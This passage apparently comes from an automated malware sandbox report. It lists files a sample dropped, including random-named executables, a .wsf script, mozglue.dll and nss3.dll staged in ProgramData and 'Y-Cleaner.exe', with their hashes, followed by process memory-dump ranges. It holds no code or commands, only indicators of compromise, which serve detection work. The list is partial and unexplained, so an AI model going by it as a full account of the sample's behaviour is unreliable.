                                                                        1fe8fe00ef8eeab0f4ee0313bb145425cec548a2769b58487ba0f32651ef02fe51bc08fa80177b498160ece1a849fb8513caada7a14214542f6ef0ccb5cab125

                                                                      • C:\Users\Admin\Documents\iofolko5\tfmFmOWNPNI7GnkJAKssBMrv.exe

                                                                        Filesize

                                                                        4.0MB

                                                                        MD5

                                                                        087d510f4d69f6faa479e4919f51a175

                                                                        SHA1

                                                                        084c49d7c83b257aacf8c94b28b992c326a2ad09

                                                                        SHA256

                                                                        1dd7892458eab123c341452aff6f4d817f290efc7f8c97b76bdb78e1e1fcf8d2

                                                                        SHA512

                                                                        0621648c405f3670c11dc08349bb69dfd83c3cebb719b2dd5b0adfb5878205805b308608b79728fed53ac33d67c726d7951c71dcce4fcd0c3bef04fb1340140c

                                                                      • C:\Windows\Temp\ujfGTnqxDJAJlXPO\dVAxNtVU\eQgoxRKGTZiQbVVr.wsf

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        c2dbf4fd8d8b8102f8722c8ea61f0a79

                                                                        SHA1

                                                                        52b947647bc95d35204908e1f73436e6d56f7029

                                                                        SHA256

                                                                        b175d39feacc4be90a5d8196d6457b21e722e28d300d17a56481c745fd8ee818

                                                                        SHA512

                                                                        4a1eff1a04d22d12a33573f8a2e6f9b42edb1d6db30714660e5dfc0ebe6df6aace07121d1a009186e50fbca529b40343821b801abee579de5f0266e86ba38943

                                                                      • \ProgramData\mozglue.dll

                                                                        Filesize

                                                                        593KB

                                                                        MD5

                                                                        c8fd9be83bc728cc04beffafc2907fe9

                                                                        SHA1

                                                                        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                        SHA256

                                                                        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                        SHA512

                                                                        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                      • \ProgramData\nss3.dll

                                                                        Filesize

                                                                        2.0MB

                                                                        MD5

                                                                        1cc453cdf74f31e4d913ff9c10acdde2

                                                                        SHA1

                                                                        6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                        SHA256

                                                                        ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                        SHA512

                                                                        dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                      • \Users\Admin\AppData\Local\Temp\7zS277E.tmp\Install.exe

                                                                        Filesize

                                                                        6.4MB

                                                                        MD5

                                                                        1dc3c88196e49f85cf6b845d37700830

                                                                        SHA1

                                                                        65e7fa8ff297d93775b83643ff15cbec698fc49a

                                                                        SHA256

                                                                        bb8f44a41cc9af9b45a52b19c8745a362b8f12d632aa3a9f8976d0f1d6f76244

                                                                        SHA512

                                                                        1227fcbee644d29bd7334af9c183d3987babc0311c515ade430b53e29c04962258086fa91611d837b74dc8cbdb0074c31a86d129ace9f37cdebce4f5fceea22d

                                                                      • \Users\Admin\AppData\Local\Temp\7zS2C9C.tmp\Install.exe

                                                                        Filesize

                                                                        6.7MB

                                                                        MD5

                                                                        52295e98d8559ffbe3072c56297615b8

                                                                        SHA1

                                                                        2f1ea46188798ef13a1bca992ad6a23a9bd21491

                                                                        SHA256

                                                                        50af22f4ea393c576a1431bfbbe8c84d2a6d5b9bb6f4039aa67f1a1eb5814422

                                                                        SHA512

                                                                        d98c71160e31bc880be50007e8d4e0b70d4a04cbd02d89867380ca7a1a396d85dd6c4da521e551556dd9bfb9855c2458c3a14d7683b787c560153bca3754f006

                                                                      • \Users\Admin\AppData\Local\Temp\CVw12w4DdGSD1sC5G3GDdNWd\Y-Cleaner.exe

                                                                        Filesize

                                                                        1.4MB

                                                                        MD5

                                                                        a8cf5621811f7fac55cfe8cb3fa6b9f6

                                                                        SHA1

                                                                        121356839e8138a03141f5f5856936a85bd2a474

                                                                        SHA256

                                                                        614a0362ab87cee48d0935b5bb957d539be1d94c6fdeb3fe42fac4fbe182c10c

                                                                        SHA512

                                                                        4479d951435f222ca7306774002f030972c9f1715d6aaf512fca9420dd79cb6d08240f80129f213851773290254be34f0ff63c7b1f4d554a7db5f84b69e84bdd

                                                                      • memory/548-20-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-21-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-81-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-114-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-125-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-5-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-103-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-97-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-10-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-18-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-16-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-13-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/548-56-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-9-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-8-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-85-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-7-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-6-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-19-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-26-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-25-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-52-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-24-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-23-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/548-22-0x0000000000400000-0x00000000005E1000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/780-146-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-141-0x0000000000130000-0x0000000000131000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-161-0x0000000000170000-0x0000000000171000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-159-0x0000000000170000-0x0000000000171000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-156-0x0000000000160000-0x0000000000161000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-154-0x0000000000160000-0x0000000000161000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-151-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-149-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-147-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-144-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-142-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-137-0x0000000000130000-0x0000000000131000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/780-139-0x0000000000130000-0x0000000000131000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/816-514-0x0000000001100000-0x00000000017B2000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/816-529-0x0000000001100000-0x00000000017B2000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/932-526-0x0000000002800000-0x0000000002808000-memory.dmp

                                                                        Filesize

                                                                        32KB

                                                                      • memory/932-525-0x000000001B680000-0x000000001B962000-memory.dmp

                                                                        Filesize

                                                                        2.9MB

                                                                      • memory/1664-195-0x00000000023E0000-0x0000000002A92000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/1664-227-0x00000000023E0000-0x0000000002A92000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/1804-559-0x00000000022D0000-0x00000000022D8000-memory.dmp

                                                                        Filesize

                                                                        32KB

                                                                      • memory/1804-558-0x000000001B570000-0x000000001B852000-memory.dmp

                                                                        Filesize

                                                                        2.9MB

                                                                      • memory/1816-127-0x0000000069CC0000-0x000000006A377000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/2172-14-0x0000000073F40000-0x000000007462E000-memory.dmp

                                                                        Filesize

                                                                        6.9MB

                                                                      • memory/2172-0-0x0000000073F4E000-0x0000000073F4F000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/2172-1-0x00000000010A0000-0x0000000001284000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                      • memory/2172-2-0x0000000073F40000-0x000000007462E000-memory.dmp

                                                                        Filesize

                                                                        6.9MB

                                                                      • memory/2172-4-0x0000000073F40000-0x000000007462E000-memory.dmp

                                                                        Filesize

                                                                        6.9MB

                                                                      • memory/2312-230-0x0000000001610000-0x0000000001CC2000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/2312-229-0x0000000001610000-0x0000000001CC2000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/2312-200-0x0000000000F50000-0x0000000001602000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/2312-196-0x0000000001610000-0x0000000001CC2000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/2312-197-0x0000000001610000-0x0000000001CC2000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/2312-231-0x0000000000F50000-0x0000000001602000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/2312-199-0x0000000001610000-0x0000000001CC2000-memory.dmp

                                                                        Filesize

                                                                        6.7MB

                                                                      • memory/3032-540-0x000000001B630000-0x000000001B912000-memory.dmp

                                                                        Filesize

                                                                        2.9MB

                                                                      • memory/3032-541-0x0000000002790000-0x0000000002798000-memory.dmp

                                                                        Filesize

                                                                        32KB